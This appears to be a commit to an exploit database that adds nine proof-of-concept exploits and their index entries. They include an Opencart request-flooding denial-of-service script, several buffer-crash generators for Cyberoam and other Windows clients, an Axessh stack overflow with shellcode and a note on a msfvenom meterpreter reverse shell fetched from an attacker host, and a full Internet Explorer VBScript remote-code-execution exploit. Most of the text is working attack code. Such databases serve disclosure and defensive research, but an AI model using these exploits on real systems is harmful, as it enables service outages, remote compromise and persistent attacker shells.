DB: 2019-05-25

9 changes to exploits/shellcodes Cyberoam SSLVPN Client 1.3.1.30 - 'Connect To Server' Denial of Service (PoC) Cyberoam SSLVPN Client 1.3.1.30 - 'HTTP Proxy' Denial of Service (PoC) Cyberoam Transparent Authentication Suite 2.1.2.5 - 'Fully Qualified Domain Name' Denial of Service (PoC) Cyberoam Transparent Authentication Suite 2.1.2.5 - 'NetBIOS Name' Denial of Service (PoC) Cyberoam General Authentication Client 2.1.2.7 - 'Server Address' Denial of Service (PoC) Fast AVI MPEG Joiner - 'License Name' Denial of Service (PoC) Axessh 4.2 - 'Log file name' Local Stack-based Buffer Overflow Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC
2019-05-25 05:01:58 +00:00 · 2019-05-25 05:01:58 +00:00 · 76aff025ee
commit 76aff025ee
parent 970f7b1104
10 changed files with 379 additions and 0 deletions
--- a/exploits/php/webapps/46921.sh
+++ b/exploits/php/webapps/46921.sh
@ -0,0 +1,58 @@
+#!/bin/bash
+#
+#  Opencart <= 3.0.3.2 'extension/feed/google_base' Remote Denial of Service PoC exploit
+#
+#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
+#
+#  PoC exploit, just for test...
+#  Tested on store with added more than 1000 products
+#  Usage: ./cartkiller.sh store_url threads sleep
+#  Example: ./cartkiller.sh https://store_name 50 5
+#
+#
+#  Disclaimer:
+#  This or previous programs is for Educational 
+#  purpose ONLY. Do not use it without permission. 
+#  The usual disclaimer applies, especially the 
+#  fact that Todor Donev is not liable for any 
+#  damages caused by direct or indirect use of the 
+#  information or functionality provided by these 
+#  programs. The author or any Internet provider 
+#  bears NO responsibility for content or misuse 
+#  of these programs or any derivatives thereof.
+#  By using these programs you accept the fact 
+#  that any damage (dataloss, system crash, 
+#  system compromise, etc.) caused by the use 
+#  of these programs is not Todor Donev's 
+#  responsibility.
+#   
+#  Use them at your own risk!
+#
+
+echo "Opencart <= 3.0.3.2 'extension/feed/google_base' Remote Denial of Service PoC exploit"
+echo
+echo "Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>"
+echo
+echo "PoC exploit, just for test..."
+echo "Tested on store with added more than 1000 products"
+
+if [ -z "$3" ]; then
+echo Usage: "$0" store_url threads sleep
+echo Example: "$0" https://store_name 50 5
+exit 4
+fi
+ 
+url="$1"
+threads="$2"
+sleep="$3"
+while :
+do
+        for ((i=1;i<=$2;i++)); 
+        do 	
+	    wget "$url/index.php?route=extension/feed/google_base" --user-agent="Mozilla/5.0 (OpenCart Killer v2 google_base Denial Of Service)" --quiet -O /dev/null -o /dev/null &
+        done
+#
+# Sleep between loops..
+#      
+sleep $sleep
+done
--- a/exploits/windows/dos/46923.py
+++ b/exploits/windows/dos/46923.py
@ -0,0 +1,23 @@
+#Exploit Title: Cyberoam SSLVPN Client 1.3.1.30 - 'Connect To Server' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-23
+#Vendor Homepage: https://www.cyberoam.com
+#Software Link: https://download.cyberoam.com/solution/optionals/i18n/CrSSL_v1.3.1.30.zip
+#Tested Version: 1.3.1.30
+#Tested on: Windows Windows 10 Single Language x64 / Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: c_sslvpn_cts.py
+#2.- Open c_sslvpn_cts.txt and copy content to clipboard
+#3.- Open Cyberoam SSLVPN Client
+#4.- Select Server Settings 
+#5.- In "Connect To Server" field paste Clipboard
+#6.- In "Port" type 80
+#7.- Select "OK"
+#8.- Crashed! 
+
+cod = "\x41" * 5000
+
+f = open('c_sslvpn_cts.txt', 'w')
+f.write(cod)
+f.close()
--- a/exploits/windows/dos/46924.py
+++ b/exploits/windows/dos/46924.py
@ -0,0 +1,23 @@
+#Exploit Title: Cyberoam SSLVPN Client 1.3.1.30 - 'HTTP Proxy' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-23
+#Vendor Homepage: https://www.cyberoam.com
+#Software Link: https://download.cyberoam.com/solution/optionals/i18n/CrSSL_v1.3.1.30.zip
+#Tested Version: 1.3.1.30
+#Tested on: Windows Windows 10 Single Language x64 / Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: c_sslvpn_http.py
+#2.- Open c_sslvpn_http.txt and copy content to clipboard
+#3.- Open Cyberoam SSLVPN Client
+#4.- Select Proxy Settings > Enable "Manual Configuration"
+#5.- In "HTTP Proxy" address field paste Clipboard
+#6.- In "Port" type 80
+#7.- Select "OK"
+#8.- Crashed! 
+
+cod = "\x41" * 5000
+
+f = open('c_sslvpn_http.txt', 'w')
+f.write(cod)
+f.close()
--- a/exploits/windows/dos/46925.py
+++ b/exploits/windows/dos/46925.py
@ -0,0 +1,22 @@
+#Exploit Title: Cyberoam Transparent Authentication Suite 2.1.2.5 - 'Fully Qualified Domain Name' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-23
+#Vendor Homepage: https://www.cyberoam.com
+#Software Link: https://download.cyberoam.com/solution/optionals/i18n/CTAS%202.1.2.5%20Release.zip
+#Tested Version: 2.1.2.5
+#Tested on: Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: ctas_fqdn_2.1.2.5.py
+#2.- Open ctas_fqdn_2.1.2.5.txt and copy content to clipboard
+#3.- Open Cyberoam Transparent Authentication Suite
+#4.- Select General > in Domain Type select "Microsoft Active Directory"
+#5.- In "Fully Qualified Domain Name" paste Clipboard
+#6.- Click on "Apply"
+#7.- Crashed! 
+
+cod = "\x41" * 1000
+
+f = open('ctas_fqdn_2.1.2.5.txt', 'w')
+f.write(cod)
+f.close()
--- a/exploits/windows/dos/46926.py
+++ b/exploits/windows/dos/46926.py
@ -0,0 +1,22 @@
+#Exploit Title: Cyberoam Transparent Authentication Suite 2.1.2.5 - 'NetBIOS Name' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-23
+#Vendor Homepage: https://www.cyberoam.com
+#Software Link: https://download.cyberoam.com/solution/optionals/i18n/CTAS%202.1.2.5%20Release.zip
+#Tested Version: 2.1.2.5
+#Tested on: Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: ctas_nn_2.1.2.5.py
+#2.- Open ctas_nn_2.1.2.5.txt and copy content to clipboard
+#3.- Open Cyberoam Transparent Authentication Suite
+#4.- Select General > in Domain Type select "Microsoft Active Directory"
+#5.- In "NetBIOS Name" Paste Clipboard
+#6.- Click on "Apply"
+#7.- Crashed! 
+
+cod = "\x41" * 1500
+
+f = open('ctas_nn_2.1.2.5.txt', 'w')
+f.write(cod)
+f.close()
--- a/exploits/windows/dos/46927.py
+++ b/exploits/windows/dos/46927.py
@ -0,0 +1,21 @@
+#Exploit Title: Cyberoam General Authentication Client 2.1.2.7 - Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-23
+#Vendor Homepage: https://www.cyberoam.com
+#Software Link: https://download.cyberoam.com/solution/optionals/i18n/Cyberoam%20General%20Authentication%20Client%202.1.2.7.zip
+#Tested Version: 2.1.2.7
+#Tested on: Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: cgac_2.1.2.7.py
+#2.- Open cgac_2.1.2.7.txt and copy content to clipboard
+#3.- Open Cyberoam General Authentication Client
+#4.- In "Server Address" field paste Clipboard
+#5.- Click on "Test"
+#6.- Crashed! 
+
+cod = "\x41" * 256
+
+f = open('cgac_2.1.2.7.txt', 'w')
+f.write(cod)
+f.close()
--- a/exploits/windows/dos/46929.py
+++ b/exploits/windows/dos/46929.py
@ -0,0 +1,29 @@
+# Exploit Title: Fast AVI MPEG Joiner Dos Exploit
+# Date: 24.5.2019
+# Vendor Homepage:http://www.alloksoft.com
+# Software Link:  http://www.alloksoft.com/fast_avimpegjoiner.exe
+# Exploit Author: Achilles
+# Tested Version: 1.2.0812
+# Tested on: Windows 7 x64 Sp1
+#            Windows XP x86 Sp3
+
+
+# 1.- Run python code :Joiner.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open Fast AVI MPEG Joiner.exe
+# 4.- Paste the content of EVIL.txt into the Field: 'License Name'
+# 5.- Click 'Register'and you will see a crash.
+
+
+
+#!/usr/bin/env python
+buffer = "\x41" * 6000
+
+try:
+	f=open("Evil.txt","w")
+	print "[+] Creating %s bytes evil payload.." %len(buffer)
+	f.write(buffer)
+	f.close()
+	print "[+] File created!"
+except:
+	print "File cannot be created"
--- a/exploits/windows/local/46922.py
+++ b/exploits/windows/local/46922.py
@ -0,0 +1,42 @@
+# Title: Axessh 4.2 - 'Log file name'  Local Stack-based Buffer Overflow
+# Date: May 23rd, 2019
+# Author: Uday Mittal (https://github.com/yaksas443/YaksasCSC-Lab/)
+# Vendor Homepage: http://www.labf.com
+# Software Link: http://www.labf.com/download/axessh.exe
+# Version v4.2
+# Tested on: Windows 7 SP1 EN (x86)
+# Reference: https://www.exploit-db.com/exploits/46858
+
+# TO RUN:
+# 0. Setup a multi/handler listener
+# 1. Run python script
+# 2. Copy contents of axssh.txt
+# 3. Open telnet_S.exe
+# 4. Select Details >> Settings >> Logging
+# 5. Select Log all Session Output radio button
+# 6. Paste the contents in Log file name
+# 7. Press "OK"
+# 8. Press "OK"
+
+# EIP offset: 214
+# 0x050e3f04 : push esp # ret  | ascii {PAGE_EXECUTE_READ} [ctl3d32.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v2.31.000 (C:\Windows\system32\ctl3d32.dll)
+
+
+#77da395c - Address of LoadLibraryA() for Windows 7 SPI x86
+#777db16f - Address of system() for Windows 7 SPI x86
+#77da214f - Address of ExitProcess for Windows 7 SPI x86
+
+# Shellcode Reference: https://www.exploit-db.com/shellcodes/46281
+# Payload command command: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.163 LPORT=4444 EXITFUNC=seh -f msi > /var/www/html/ms.msi
+# When the payload runs, it floods the system with Command windows and sends back a meterpreter shell. The shell does not die even if the user closes the application.
+
+
+filename = "axssh.txt"
+
+msiScode = "\x31\xc0\x66\xb8\x72\x74\x50\x68\x6d\x73\x76\x63\x54\xbb\x5c\x39\xda\x77\xff\xd3\x89\xc5\x31\xc0\x50\x68\x20\x2f\x71\x6e\x68\x2e\x6d\x73\x69\x68\x33\x2f\x6d\x73\x68\x36\x2e\x31\x36\x68\x38\x2e\x31\x32\x68\x32\x2e\x31\x36\x68\x2f\x2f\x31\x39\x68\x74\x74\x70\x3a\x68\x2f\x69\x20\x68\x68\x78\x65\x63\x20\x68\x6d\x73\x69\x65\x89\xe7\x57\xb8\x6f\xb1\x7d\x77\xff\xd0\x31\xc0\x50\xb8\x4f\x21\xda\x77"
+
+evilString = "\x90" * 110 + msiScode + "\x90" * 6 + "\x04\x3f\x0e\x05" + "\x90"*4 + "\x89\xE0\x83\xE8\x7F\x89\xC4\xEB\x81" + "\x90" * 800
+
+file = open(filename,'w')
+file.write(evilString)
+file.close()
--- a/exploits/windows/remote/46928.html
+++ b/exploits/windows/remote/46928.html
@ -0,0 +1,130 @@
+<!-- Full exploit of ZDI-19-359/ZDI-CAN-7757/CVE-2019-0752                                      -->
+<!-- Target: Internet Explorer, Windows 10 1809 17763.316 (Feb. 2019 patch level)               -->
+<!-- Vulnerability and original exploit technique by Simon Zuckerbraun (@HexKitchen), Mar. 2019 -->
+
+<!-- Tgroupcrew@gmail.com -->
+
+<!-- Demonstrates taking an arbitrary write primitive with no info leak, and using it to get    -->
+<!-- all the way to RCE using no shellcode.                                                     -->
+
+<!-- Note use of CVE-2019-0768 to get VBScript to run on IE/Win10.                              -->
+<!--    (h/t: James Forshaw, Google Project Zero)                                               -->
+
+<html>
+<meta http-equiv="x-ua-compatible" content="IE=8">
+<meta http-equiv="Expires" content="-1">
+<body>
+	<div id="container1" style="overflow:scroll; width: 10px">
+		<div id="content1" style="width:5000000px">
+			Content
+		</div>
+	</div>
+<script language="VBScript.Encode">
+Dim ar1(&h3000000)
+Dim ar2(1000)
+Dim gremlin
+addressOfGremlin = &h28281000
+Class MyClass
+	Private mValue
+	Public Property Let Value(v)
+		mValue = v
+	End Property
+	Public Default Property Get P
+		P = mValue				' Where to write
+	End Property
+End Class
+Sub TriggerWrite(where, val)
+	Dim v1
+	Set v1 = document.getElementById("container1")
+	v1.scrollLeft = val		' Write this value (Maximum: 0x001767dd)
+	Dim c
+	Set c = new MyClass
+	c.Value = where
+	Set v1.scrollLeft = c
+End Sub
+' Our vulnerability does not immediately give us an unrestricted
+' write (though we could manufacture one). For our purposes, the
+' following is sufficient. It writes an arbitrary DWORD to an
+' arbitrary location, and sets the subsequent 3 bytes to zero.
+Sub WriteInt32With3ByteZeroTrailer(addr, val)
+	TriggerWrite addr    , (val) AND &hff
+	TriggerWrite addr + 1, (val\&h100) AND &hff
+	TriggerWrite addr + 2, (val\&h10000) AND &hff
+	TriggerWrite addr + 3, (val\&h1000000) AND &hff
+End Sub
+Sub WriteAsciiStringWith4ByteZeroTrailer(addr, str)
+	For i = 0 To Len(str) - 1
+		TriggerWrite addr + i, Asc(Mid(str, i + 1, 1))
+	Next
+End Sub
+Function ReadInt32(addr)
+	WriteInt32With3ByteZeroTrailer addressOfGremlin + &h8, addr
+	ReadInt32 = ar1(gremlin)
+End Function
+Function LeakAddressOfObject(obj)
+	Set ar1(gremlin + 1) = obj
+	LeakAddressOfObject = ReadInt32(addressOfGremlin + &h18)
+End Function
+Sub Exploit()
+	' Corrupt vt of one array element (the "gremlin")
+	TriggerWrite addressOfGremlin, &h4003	' VT_BYREF | VT_I4
+	For i = ((addressOfGremlin - &h20) / &h10) Mod &h100 To UBound(ar1) Step &h100
+		If Not IsEmpty(ar1(i)) Then
+			gremlin = i
+			Exit For
+		End If
+	Next
+	
+	If IsEmpty(gremlin) Then
+		MsgBox "Could not find gremlin"
+		Exit Sub
+	End If
+	
+	For i = 0 To UBound(ar2)
+		Set ar2(i) = CreateObject("Scripting.Dictionary")
+	Next
+	
+	Set dict = ar2(UBound(ar2) / 2)
+	addressOfDict = LeakAddressOfObject(dict)
+	vtableOfDict = ReadInt32(addressOfDict)
+	scrrun = vtableOfDict - &h11fc
+	kernel32 = ReadInt32(scrrun + &h1f1a4) - &h23c90
+	winExec = kernel32 + &h5d380
+	
+	dict.Exists "dummy"		' Make a dispatch call, just to populate pld
+	' Relocate pld to ensure its address doesn't contain a null byte
+	pld = ReadInt32(addressOfDict + &h3c)
+	fakePld = &h28281020
+	For i = 0 To 3 - 1
+		WriteInt32With3ByteZeroTrailer fakePld + 4 * i, ReadInt32(pld + 4 * i)
+	Next
+	
+	fakeVtable = &h28282828		' ASCII "(((("
+	For i = 0 To 21
+		If i = 12 Then		' Dictionary.Exists
+			fptr = winExec
+		Else
+			fptr = ReadInt32(vtableOfDict + 4 * i)
+		End If
+		WriteInt32With3ByteZeroTrailer (fakeVtable + 4 * i), fptr
+	Next
+	
+	WriteAsciiStringWith4ByteZeroTrailer addressOfDict, "((((\..\PowerShell.ewe -Command ""<#AAAAAAAAAAAAAAAAAAAAAAAAA"
+	WriteInt32With3ByteZeroTrailer addressOfDict + &h3c, fakePld
+	WriteAsciiStringWith4ByteZeroTrailer addressOfDict + &h40, "#>$a = """"Start-Process cmd `""""""/t:4f /k whoami /user`"""""""""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"""
+	
+	On Error Resume Next
+	dict.Exists "dummy"		' Wheeee!!
+	
+	' A little cleanup to help prevent crashes after the exploit
+	For i = 1 To 3
+		WriteInt32With3ByteZeroTrailer addressOfDict + &h48 * i, vtableOfDict
+		WriteInt32With3ByteZeroTrailer addressOfDict + (&h48 * i) + &h14, 2
+	Next
+	Erase Dict
+	Erase ar2
+End Sub
+Exploit
+</script>
+</body>
+</html>
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6461,6 +6461,12 @@ id,file,description,date,author,type,platform,port
 46909,exploits/windows/dos/46909.py,"NetAware 1.20 - 'Share Name' Denial of Service (PoC)",2019-05-23,"Alejandra Sánchez",dos,windows,
 46911,exploits/windows/dos/46911.py,"Terminal Services Manager 3.2.1 - Denial of Service",2019-05-23,"Alejandra Sánchez",dos,windows,
 46913,exploits/ios/dos/46913.txt,"Visual Voicemail for iPhone - IMAP NAMESPACE Processing Use-After-Free",2019-05-23,"Google Security Research",dos,ios,
+46923,exploits/windows/dos/46923.py,"Cyberoam SSLVPN Client 1.3.1.30 - 'Connect To Server' Denial of Service (PoC)",2019-05-24,"Victor Mondragón",dos,windows,
+46924,exploits/windows/dos/46924.py,"Cyberoam SSLVPN Client 1.3.1.30 - 'HTTP Proxy' Denial of Service (PoC)",2019-05-24,"Victor Mondragón",dos,windows,
+46925,exploits/windows/dos/46925.py,"Cyberoam Transparent Authentication Suite 2.1.2.5 - 'Fully Qualified Domain Name' Denial of Service (PoC)",2019-05-24,"Victor Mondragón",dos,windows,
+46926,exploits/windows/dos/46926.py,"Cyberoam Transparent Authentication Suite 2.1.2.5 - 'NetBIOS Name' Denial of Service (PoC)",2019-05-24,"Victor Mondragón",dos,windows,
+46927,exploits/windows/dos/46927.py,"Cyberoam General Authentication Client 2.1.2.7 - 'Server Address' Denial of Service (PoC)",2019-05-24,"Victor Mondragón",dos,windows,
+46929,exploits/windows/dos/46929.py,"Fast AVI MPEG Joiner - 'License Name' Denial of Service (PoC)",2019-05-24,Achilles,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10521,6 +10527,7 @@ id,file,description,date,author,type,platform,port
 46918,exploits/windows/local/46918.txt,"Microsoft Windows (x84) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation",2019-05-22,SandboxEscaper,local,windows,
 46919,exploits/windows/local/46919.txt,"Microsoft Internet Explorer 11 - Sandbox Escape",2019-05-22,SandboxEscaper,local,windows,
 46920,exploits/windows/local/46920.txt,"Microsoft Windows - 'Win32k' Local Privilege Escalation",2019-05-15,ExpLife0011,local,windows,
+46922,exploits/windows/local/46922.py,"Axessh 4.2 - 'Log file name' Local Stack-based Buffer Overflow",2019-05-24,"Uday Mittal",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17457,6 +17464,7 @@ id,file,description,date,author,type,platform,port
 46839,exploits/php/remote/46839.rb,"PHP-Fusion 9.03.00 - 'Edit Profile' Remote Code Execution (Metasploit)",2019-05-14,AkkuS,remote,php,
 46880,exploits/php/remote/46880.rb,"GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)",2019-05-20,Metasploit,remote,php,
 46915,exploits/php/remote/46915.rb,"Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)",2019-05-23,Metasploit,remote,php,
+46928,exploits/windows/remote/46928.html,"Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption",2019-05-24,"Simon Zuckerbraun",remote,windows,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -41340,3 +41348,4 @@ id,file,description,date,author,type,platform,port
 46898,exploits/hardware/webapps/46898.txt,"Carel pCOWeb < B1.2.1 - Credentials Disclosure",2019-05-22,Luca.Chiou,webapps,hardware,
 46903,exploits/php/webapps/46903.txt,"Horde Webmail 5.2.22 - Multiple Vulnerabilities",2019-05-22,InfinitumIT,webapps,php,
 46910,exploits/php/webapps/46910.txt,"Nagios XI 5.6.1 - SQL injection",2019-05-23,JameelNabbo,webapps,php,
+46921,exploits/php/webapps/46921.sh,"Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC",2019-05-24,"Todor Donev",webapps,php,